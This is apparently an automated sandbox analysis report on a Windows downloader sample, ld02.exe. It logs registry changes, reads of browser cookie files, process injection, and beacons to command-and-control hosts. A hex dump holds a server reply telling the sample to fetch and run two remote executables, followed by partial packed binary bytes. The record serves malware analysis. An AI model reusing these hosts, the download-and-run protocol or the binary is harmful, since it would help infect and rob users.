HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000006  PackedCatalogItem  %SystemRoot%\​system32\​mswsock. 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000007  PackedCatalogItem  %SystemRoot%\​system32\​mswsock. 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000008  PackedCatalogItem  %SystemRoot%\​system32\​mswsock. 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000009  PackedCatalogItem  %SystemRoot%\​system32\​mswsock. 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000010  PackedCatalogItem  %SystemRoot%\​system32\​mswsock. 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000011  PackedCatalogItem  %SystemRoot%\​system32\​mswsock. 
HKLM\​System\​Setup  SystemSetupInProgress 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Environment  TEMP  %USERPROFILE%\​Local Settings\​Temp 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Environment  TMP  %USERPROFILE%\​Local Settings\​Temp 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings  CertificateRevocation 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings  DisableCachingOfSSLPages 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings  EnableHttp1_1 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings  EnableNegotiate 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings  MimeExclusionListForCache  multipart/mixed multipart/x-mixed-replace multipart/x-byteranges  
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings  SecureProtocols  160 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings  WarnOnPost  0x01000000 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings  WarnOnZoneCrossing 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows NT\​CurrentVersion\​Winlogon  ParseAutoexec 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders  Cache  C:\​Documents and Settings\​user\​Local Settings\​Temporary Internet Files 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​User Shell Folders  AppData  %USERPROFILE%\​Application Data 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​User Shell Folders  Cache  %USERPROFILE%\​Local Settings\​Temporary Internet Files 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​User Shell Folders  Cookies  %USERPROFILE%\​Cookies 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​User Shell Folders  History  %USERPROFILE%\​Local Settings\​History 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​User Shell Folders  Local Settings  %USERPROFILE%\​Local Settings 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​User Shell Folders  Personal  %USERPROFILE%\​My Documents 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache  Signature  Client UrlCache MMF Ver 5.2 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Content  CacheLimit  163410 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Content  CachePrefix   
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Cookies  CacheLimit  8192 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Cookies  CachePrefix  Cookie: 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​MSHist012008051620080517  CacheLimit  8192 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​MSHist012008051620080517  CacheOptions  11 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​MSHist012008051620080517  CachePath  %USERPROFILE%\​Local Settings\​History\​History.IE5\​MSHist012008051620080517 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​MSHist012008051620080517  CachePrefix  :2008051620080517:  
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​MSHist012008051620080517  CacheRepair 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​UserData  CacheLimit  1000 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​UserData  CacheOptions 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​UserData  CachePath  %USERPROFILE%\​UserData 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​UserData  CachePrefix  UserData 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​UserData  CacheRepair 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​feedplat  CacheLimit  8192 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​feedplat  CacheOptions 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​feedplat  CachePath  %USERPROFILE%\​Local Settings\​Application Data\​Microsoft\​Feeds Cache 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​feedplat  CachePrefix  feedplat: 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Extensible Cache\​feedplat  CacheRepair 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​History  CacheLimit  8192 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​History  CachePrefix  Visited: 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​windows\​CurrentVersion\​Internet Settings  MigrateProxy 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​windows\​CurrentVersion\​Internet Settings  ProxyEnable 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​windows\​CurrentVersion\​Internet Settings\​Connections  DefaultConnectionSettings  0x3c0000000200000001000000000000000000000000000000040000000000 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​windows\​CurrentVersion\​Internet Settings\​Connections  SavedLegacySettings  0x460000006700000001000000000000000000000000000000040000000000 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Volatile Environment  APPDATA  C:\​Documents and Settings\​user\​Application Data 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Volatile Environment  CLIENTNAME   
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Volatile Environment  HOMEDRIVE  C: 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Volatile Environment  HOMEPATH  \​Documents and Settings\​user 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Volatile Environment  HOMESHARE   
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Volatile Environment  LOGONSERVER  \​\​USER 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Volatile Environment  SESSIONNAME  Console 

  - Monitored Registry Keys:  
Key Name Watch subtree Notify Filter Count
HKLM\​Software\​Microsoft\​Tracing\​RASAPI32  Attributes Change,Value Change,Security Descriptor Change 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5  Key Change 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9  Key Change 

3.b) ld02.exe - File Activities

  - Files Created:  
C:\DOCUME~1\user\LOCALS~1\Temp\jopaxx_1211198010.exe
C:\WINDOWS\tt_1211198012.exe
c:\windows\t55ft3366f44.dat

  - Files Read:  
C:\Documents and Settings\user\Cookies\user@2o7[1].txt
C:\Documents and Settings\user\Cookies\user@ad.yieldmanager[2].txt
C:\Documents and Settings\user\Cookies\user@adobe[1].txt
C:\Documents and Settings\user\Cookies\user@adopt.euroclick[1].txt
C:\Documents and Settings\user\Cookies\user@adopt.specificclick[1].txt
C:\Documents and Settings\user\Cookies\user@adrevolver[2].txt
C:\Documents and Settings\user\Cookies\user@ads.revsci[1].txt
C:\Documents and Settings\user\Cookies\user@advertising[2].txt
C:\Documents and Settings\user\Cookies\user@amazon[2].txt
C:\Documents and Settings\user\Cookies\user@apmebf[2].txt
C:\Documents and Settings\user\Cookies\user@ar.voicefive[1].txt
C:\Documents and Settings\user\Cookies\user@atdmt[2].txt
C:\Documents and Settings\user\Cookies\user@atwola[1].txt
C:\Documents and Settings\user\Cookies\user@burstnet[1].txt
C:\Documents and Settings\user\Cookies\user@c.msn[2].txt
C:\Documents and Settings\user\Cookies\user@c1.microsoft[1].txt
C:\Documents and Settings\user\Cookies\user@casalemedia[2].txt
C:\Documents and Settings\user\Cookies\user@com[1].txt
C:\Documents and Settings\user\Cookies\user@contextweb[1].txt
C:\Documents and Settings\user\Cookies\user@doubleclick[1].txt
C:\Documents and Settings\user\Cookies\user@download[2].txt
C:\Documents and Settings\user\Cookies\user@ehg-verizon.hitbox[2].txt
C:\Documents and Settings\user\Cookies\user@fastclick[2].txt
C:\Documents and Settings\user\Cookies\user@google[1].txt
C:\Documents and Settings\user\Cookies\user@google[2].txt
C:\Documents and Settings\user\Cookies\user@hitbox[2].txt
C:\Documents and Settings\user\Cookies\user@icq[1].txt
C:\Documents and Settings\user\Cookies\user@iseclab[1].txt
C:\Documents and Settings\user\Cookies\user@live365[1].txt
C:\Documents and Settings\user\Cookies\user@live[1].txt
C:\Documents and Settings\user\Cookies\user@m.webtrends[2].txt
C:\Documents and Settings\user\Cookies\user@media.adrevolver[1].txt
C:\Documents and Settings\user\Cookies\user@mediaplex[1].txt
C:\Documents and Settings\user\Cookies\user@microsoft[2].txt
C:\Documents and Settings\user\Cookies\user@microsoftwga.112.2o7[1].txt
C:\Documents and Settings\user\Cookies\user@msn[1].txt
C:\Documents and Settings\user\Cookies\user@msnportal.112.2o7[1].txt
C:\Documents and Settings\user\Cookies\user@news[1].txt
C:\Documents and Settings\user\Cookies\user@onlinestores.metaservices.microsoft[1].txt
C:\Documents and Settings\user\Cookies\user@planetpdf[1].txt
C:\Documents and Settings\user\Cookies\user@questionmarket[2].txt
C:\Documents and Settings\user\Cookies\user@rad.msn[2].txt
C:\Documents and Settings\user\Cookies\user@realmedia[1].txt
C:\Documents and Settings\user\Cookies\user@revsci[2].txt
C:\Documents and Settings\user\Cookies\user@search.live[2].txt
C:\Documents and Settings\user\Cookies\user@search.microsoft[1].txt
C:\Documents and Settings\user\Cookies\user@support.microsoft[1].txt
C:\Documents and Settings\user\Cookies\user@symantec[2].txt
C:\Documents and Settings\user\Cookies\user@tacoda[1].txt
C:\Documents and Settings\user\Cookies\user@tribalfusion[1].txt
C:\Documents and Settings\user\Cookies\user@update.microsoft[1].txt
C:\Documents and Settings\user\Cookies\user@verizon[1].txt
C:\Documents and Settings\user\Cookies\user@voicefive[1].txt
C:\Documents and Settings\user\Cookies\user@westernunion[2].txt
C:\Documents and Settings\user\Cookies\user@www.microsoft[2].txt
C:\Documents and Settings\user\Cookies\user@www.msn[2].txt
C:\Documents and Settings\user\Cookies\user@www22.verizon[1].txt
C:\Documents and Settings\user\Cookies\user@zedo[1].txt
PIPE\lsarpc
c:\autoexec.bat

  - Files Modified:  
C:\DOCUME~1\user\LOCALS~1\Temp\jopaxx_1211198010.exe
C:\WINDOWS\tt_1211198012.exe
PIPE\lsarpc
WMIDataDevice
\Device\Afd\Endpoint
\Device\RasAcd
c:\windows\t55ft3366f44.dat

  - File System Control Communication:  
File Control Code Times
PIPE\lsarpc  0x0011C017  22 

  - Device Control Communication:  
File Control Code Times
unnamed file  0x00390008 
WMIDataDevice  0x0022414C 
WMIDataDevice  0x00228144 
\Device\RasAcd  0x00F14014 
\Device\Afd\Endpoint  AFD_GET_INFO (0x0001207B) 
\Device\Afd\Endpoint  AFD_SET_CONTEXT (0x00012047)  15 
\Device\Afd\Endpoint  AFD_BIND (0x00012003) 
\Device\Afd\Endpoint  AFD_GET_TDI_HANDLES (0x00012037)  10 
\Device\Afd\Endpoint  AFD_CONNECT (0x00012007) 
\Device\Afd\Endpoint  AFD_SEND (0x0001201F) 
\Device\Afd\Endpoint  AFD_RECV (0x00012017)  39 

  - Memory Mapped Files:  
File Name
C:\DOCUME~1\user\LOCALS~1\Temp\jopaxx_1211198010.exe
C:\WINDOWS\System32\mswsock.dll
C:\WINDOWS\System32\winrnr.dll
C:\WINDOWS\System32\wshtcpip.dll
C:\WINDOWS\system32\Apphelp.dll
C:\WINDOWS\system32\DNSAPI.dll
C:\WINDOWS\system32\MSCTF.dll
C:\WINDOWS\system32\RASAPI32.dll
C:\WINDOWS\system32\TAPI32.dll
C:\WINDOWS\system32\WINMM.dll
C:\WINDOWS\system32\hnetcfg.dll
C:\WINDOWS\system32\rasadhlp.dll
C:\WINDOWS\system32\rasman.dll
C:\WINDOWS\system32\rpcss.dll
C:\WINDOWS\system32\rtutils.dll
C:\WINDOWS\system32\sensapi.dll
C:\WINDOWS\tt_1211198012.exe
C:\Windows\AppPatch\sysmain.sdb

3.c) ld02.exe - Windows Service Activities

  - Services Started:  
RASMAN

3.d) ld02.exe - Process Activities

  - Processes Created:  
Executable Command Line
C:\DOCUME~1\user\LOCALS~1\Temp\jopaxx_1211198010.exe   
  C:\DOCUME~1\user\LOCALS~1\Temp\\jopaxx_1211198010.exe 
C:\WINDOWS\tt_1211198012.exe   
  C:\WINDOWS\tt_1211198012.exe 

  - Remote Threads Created:  
Affected Process
C:\DOCUME~1\user\LOCALS~1\Temp\jopaxx_1211198010.exe
C:\WINDOWS\tt_1211198012.exe

  - Thread Overview:  
Time Number of threads
After 106 seconds

  - Foreign Memory Regions Read:  
Process: C:\DOCUME~1\user\LOCALS~1\Temp\jopaxx_1211198010.exe
Process: C:\WINDOWS\tt_1211198012.exe

  - Foreign Memory Regions Written:  
Process: C:\DOCUME~1\user\LOCALS~1\Temp\jopaxx_1211198010.exe
Process: C:\WINDOWS\tt_1211198012.exe

3.e) ld02.exe - Network Activity

  - DNS Queries:  
Name Query Type Query Result Successful Protocol
www.google.com  DNS_TYPE_A     
onames0603.com  DNS_TYPE_A  58.241.255.37   
aksajans.com  DNS_TYPE_A  212.58.23.82   

  -  HTTP Conversations:  
From ANUBIS:1032 to 74.125.43.147:80 - [www.google.com]
Request: GET /
Response: 302 "Found"
From ANUBIS:1033 to 58.241.255.37:80 - [onames0603.com]
Request: POST /achcheck.php
Response: 200 "OK"
Request: POST /ld/gen.php
Response: 200 "OK"
From ANUBIS:1035 to 212.58.23.82:80 - [aksajans.com]
Request: GET /gif/websrvx.exe
Response: 200 "OK"
Request: GET /gif/nfr.exe
Response: 200 "OK"

  -  Unknown TCP Traffic:  
from ANUBIS:1034 to 58.241.255.37:80
State: Normal establishment and termination - Transferred outbound Bytes: 380 - Transferred inbound Bytes: 290
Data sent:
    
504f 5354 202f 6c64 2f67 656e 2e70 6870    POST /ld/gen.php
2048 5454 502f 312e 310d 0a48 6f73 743a     HTTP/1.1..Host:
206f 6e61 6d65 7330 3630 332e 636f 6d0d     onames0603.com.
0a55 7365 722d 4167 656e 743a 204d 6f7a    .User-Agent: Moz
696c 6c61 2f34 2e30 2028 636f 6d70 6174    illa/4.0 (compat
6962 6c65 3b20 4d53 4945 2037 2e30 3b20    ible; MSIE 7.0; 
5769 6e64 6f77 7320 4e54 2035 2e31 3b20    Windows NT 5.1; 
2e4e 4554 2043 4c52 2032 2e30 2e35 3037    .NET CLR 2.0.507
3237 3b20 2e4e 4554 2043 4c52 2033 2e30    27; .NET CLR 3.0
2e34 3530 362e 3231 3532 3b20 2e4e 4554    .4506.2152; .NET
2043 4c52 2033 2e35 2e33 3037 3239 290d     CLR 3.5.30729).
0a43 6f6e 7465 6e74 2d74 7970 653a 2061    .Content-type: a
7070 6c69 6361 7469 6f6e 2f78 2d77 7777    pplication/x-www
2d66 6f72 6d2d 7572 6c65 6e63 6f64 6564    -form-urlencoded
0d0a 436f 6e6e 6563 7469 6f6e 3a20 636c    ..Connection: cl
6f73 650d 0a43 6f6e 7465 6e74 2d4c 656e    ose..Content-Len
6774 683a 2031 3132 0d0a 0d0a              gth: 112....
Data sent:
    
663d 3026 613d 3138 3234 3234 3530 3030    f=0&a=1824245000
2676 3d30 3226 633d 3026 733d 6c64 266c    &v=02&c=0&s=ld&l
3d31 3030 3026 636b 3d30 2663 5f66 623d    =1000&ck=0&c_fb=
3026 635f 6d73 3d30 2663 5f68 693d 3026    0&c_ms=0&c_hi=0&
635f 6265 3d30 2663 5f66 723d 3026 635f    c_be=0&c_fr=0&c_
7962 3d30 2663 5f74 673d 3026 635f 6e6c    yb=0&c_tg=0&c_nl
3d30 2663 5f66 753d 3026 635f 6c6a 3d30
Data received:
    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a44 6174 653a 2046 7269 2c20 3230 204d    .Date: Fri, 20 M
6172 2032 3030 3920 3131 3a32 343a 3131    ar 2009 11:24:11
2047 4d54 0d0a 5365 7276 6572 3a20 4170     GMT..Server: Ap
6163 6865 2f32 2e32 2e33 2028 4365 6e74    ache/2.2.3 (Cent
4f53 290d 0a58 2d50 6f77 6572 6564 2d42    OS)..X-Powered-B
793a 2050 4850 2f35 2e31 2e36 0d0a 436f    y: PHP/5.1.6..Co
6e74 656e 742d 4c65 6e67 7468 3a20 3131    ntent-Length: 11
330d 0a43 6f6e 6e65 6374 696f 6e3a 2063    3..Connection: c
6c6f 7365 0d0a 436f 6e74 656e 742d 5479    lose..Content-Ty
7065 3a20 7465 7874 2f68 746d 6c0d 0a0d    pe: text/html...
0a23 5049 443d 3130 3030 0a53 5441 5254    .#PID=1000.START
4f4e 4345 7c68 7474 703a 2f2f 616b 7361    ONCE|http://aksa
6a61 6e73 2e63 6f6d 2f67 6966 2f77 6562    jans.com/gif/web
7372 7678 2e65 7865 0a53 5441 5254 7c68    srvx.exe.START|h
7474 703a 2f2f 616b 7361 6a61 6e73 2e63    ttp://aksajans.c
6f6d 2f67 6966 2f6e 6672 2e65 7865 0a23    om/gif/nfr.exe.#
424c 4143 4b4c 4142 454c 0d0a 4558 4954    BLACKLABEL..EXIT
0d0a                                       ..
from ANUBIS:1036 to 212.58.23.82:80
State: Normal establishment and termination - Transferred outbound Bytes: 245 - Transferred inbound Bytes: 18684
Data sent:
    
4745 5420 2f67 6966 2f6e 6672 2e65 7865    GET /gif/nfr.exe
2048 5454 502f 312e 310d 0a48 6f73 743a     HTTP/1.1..Host:
2061 6b73 616a 616e 732e 636f 6d0d 0a55     aksajans.com..U
7365 722d 4167 656e 743a 204d 6f7a 696c    ser-Agent: Mozil
6c61 2f34 2e30 2028 636f 6d70 6174 6962    la/4.0 (compatib
6c65 3b20 4d53 4945 2037 2e30 3b20 5769    le; MSIE 7.0; Wi
6e64 6f77 7320 4e54 2035 2e31 3b20 2e4e    ndows NT 5.1; .N
4554 2043 4c52 2032 2e30 2e35 3037 3237    ET CLR 2.0.50727
3b20 2e4e 4554 2043 4c52 2033 2e30 2e34    ; .NET CLR 3.0.4
3530 362e 3231 3532 3b20 2e4e 4554 2043    506.2152; .NET C
4c52 2033 2e35 2e33 3037 3239 290d 0a43    LR 3.5.30729)..C
6f6e 7465 6e74 2d74 7970 653a 2061 7070    ontent-type: app
6c69 6361 7469 6f6e 2f78 2d77 7777 2d66    lication/x-www-f
6f72 6d2d 7572 6c65 6e63 6f64 6564 0d0a    orm-urlencoded..
436f 6e6e 6563 7469 6f6e 3a20 636c 6f73    Connection: clos
650d 0a0d 0a                               e....
Data received:
    
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a44 6174 653a 2046 7269 2c20 3230 204d    .Date: Fri, 20 M
6172 2032 3030 3920 3131 3a34 313a 3331    ar 2009 11:41:31
2047 4d54 0d0a 5365 7276 6572 3a20 4170     GMT..Server: Ap
6163 6865 0d0a 4c61 7374 2d4d 6f64 6966    ache..Last-Modif
6965 643a 2054 6875 2c20 3139 204d 6172    ied: Thu, 19 Mar
2032 3030 3920 3134 3a33 313a 3139 2047     2009 14:31:19 G
4d54 0d0a 4554 6167 3a20 2233 3161 3163    MT..ETag: "31a1c
352d 3438 3030 2d61 3734 6166 6263 3022    5-4800-a74afbc0"
0d0a 4163 6365 7074 2d52 616e 6765 733a    ..Accept-Ranges:
2062 7974 6573 0d0a 436f 6e74 656e 742d     bytes..Content-
4c65 6e67 7468 3a20 3138 3433 320d 0a43    Length: 18432..C
6f6e 6e65 6374 696f 6e3a 2063 6c6f 7365    onnection: close
0d0a 436f 6e74 656e 742d 5479 7065 3a20    ..Content-Type: 
6170 706c 6963 6174 696f 6e2f 6f63 7465    application/octe
742d 7374 7265 616d 0d0a 0d0a 4d5a 9000    t-stream....MZ..
0300 0000 0400 0000 ffff 0000 b800 0000    ................
0000 0000 4000 0000 0000 0000 0000 0000    ....@...........
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 e800 0000 0e1f ba0e    ................
00b4 09cd 21b8 014c cd21 5468 6973 2070    ....!..L.!This p
726f 6772 616d 2063 616e 6e6f 7420 6265    rogram cannot be
2072 756e 2069 6e20 444f 5320 6d6f 6465     run in DOS mode
2e0d 0d0a 2400 0000 0000 0000 a7ee 108f    ....$...........
e38f 7edc e38f 7edc e38f 7edc 9893 72dc    ..~...~...~...r.
e08f 7edc 0b90 74dc e88f 7edc 6093 70dc    ..~...t...~.`.p.
e18f 7edc 0b90 7adc e18f 7edc 8190 6ddc    ..~...z...~...m.
e68f 7edc e38f 7fdc d18f 7edc d5a9 75dc    ..~.......~...u.
e28f 7edc 2489 78dc e28f 7edc 5269 6368    ..~.$.x...~.Rich
e38f 7edc 0000 0000 0000 0000 0000 0000    ..~.............
0000 0000 5045 0000 4c01 0300 5b4b c249    ....PE..L...[K.I
0000 0000 0000 0000 e000 0f01 0b01 0600    ................
0050 0000 0010 0000 0050 0000 109f 0000    .P.......P......
0060 0000 00b0 0000 0000 4000 0010 0000    .`........@.....
0002 0000 0400 0000 0000 0000 0400 0000    ................
0000 0000 00c0 0000 0010 0000 0000 0000    ................
0200 0000 0000 1000 0010 0000 0000 1000    ................
0010 0000 0000 0000 1000 0000 0000 0000    ................
0000 0000 60b0 0000 0c01 0000 00b0 0000    ....`...........
6000 0000 0000 0000 0000 0000 0000 0000    `...............
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 5550 5830    ............UPX0
0000 0000 0050 0000 0010 0000 0000 0000    .....P..........
0004 0000 0000 0000 0000 0000 0000 0000    ................
8000 00e0 5550 5831 0000 0000 0050 0000    ....UPX1.....P..
0060 0000 0042 0000 0004 0000 0000 0000    .`...B..........
0000 0000 0000 0000 4000 00e0 2e72 7372    ........@....rsr
6300 0000 0010 0000 00b0 0000 0002 0000    c...............
0046 0000 0000 0000 0000 0000 0000 0000    .F..............
4000 00c0 0000 0000 0000 0000 0000 0000    @...............
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0033 2e30 3200 5550 5821    .......3.02.UPX!
0d09 020a b692 9f3c 404b 35d3 1974 0000    .......<@K5..t..
0c3f 0000 0058 0000 0000 0021 ffff edff    .?...X.....!....
558b ecb8 e423 0000 e8a3 0a04 8065 ff00    U....#.......e..
56ff 7508 8b35 6420 4000 8d85 2ddd dffe    V.u..5d @...-...
1cdc ffff 6828 310a 50ff d683 c40c 10fc    ....h(1.P.......
50ed 7f77 9b17 1215 2424 83f8 ff89 45e8    P..w....$$....E.
0f84 6503 3e36 fb6e f753 5768 242c 6820    ..e.>6.n.SWh$,h 
048d 45b4 6814 394d 1964 d9cc 203f 1048    ..E.h.9M.d.. ?.H
ecd6 bdb1 5d66 680c 2015 6c2f 501f ddfe    ....]fh. .l/P...
b16e 1050 2f18 85c0 0f85 a602 5733 ffba    .n.P/.......W3..
f66d 9b32 5e80 0c00 6a03 5708 0780 decc    .m.2^...j.W.....
bfe9 281c 8bd8 83fb ff0f 84ca 44ec 5053    ..(.........D.PS
fbcf bfd9 1518 3bc7 8945 f00f 865e 7801    ......;..E...^x.
57e8 b609                                  W...
Data received:
    
08fb 7ffb 6d59 12f8 8bcf 8b7d 04d1 33c0    ....mY.....}..3.
c1e9 02f3 ab8b ca6a 68e9 b6ed 7de1 03f3    .......jh...}...
aa39 91f0 02f8 3f14 6fd3 999d 7b84 180e    .9....?.o...{...
1068 08d8 d37d be9b 048b 3d64 0f00 fc30    .h...}....=d...0
04f8 361f 3ecf f4f0 e830 395c fdc0 30ef    ..6.>....09\..0.
cb6d 79d7 2810 24fe 6a47 68b8 229e e779    .my.(.$.jGh."..y
beb4 04b0 aca8 a09c 6639 ec79 9874 3a2c    ........f9.y.t:,
eccf f33c df68 7038 6c68 6460 5cb7 c9f3    ...<.hp8lhd`\...
3c58 5430 a55c 2076 fbba 6187 d8f8 4a30    <XT0.\ v..a...J0
d374 2d89 61ef ed6c 1259 1059 741b 6011    .t-.a..l.Y.Yt.`.
3fa1 fd31 0906 e91b 01fc 76c6 45ff 014d    ?..1......v.E..M
5830 0d6b 0c36 5083 853c 04a1 10c6 8940    X0.k.6P..<.....@
3609 85e7 e100 f459 51d6 88df e6fe 0663    6......YQ......c
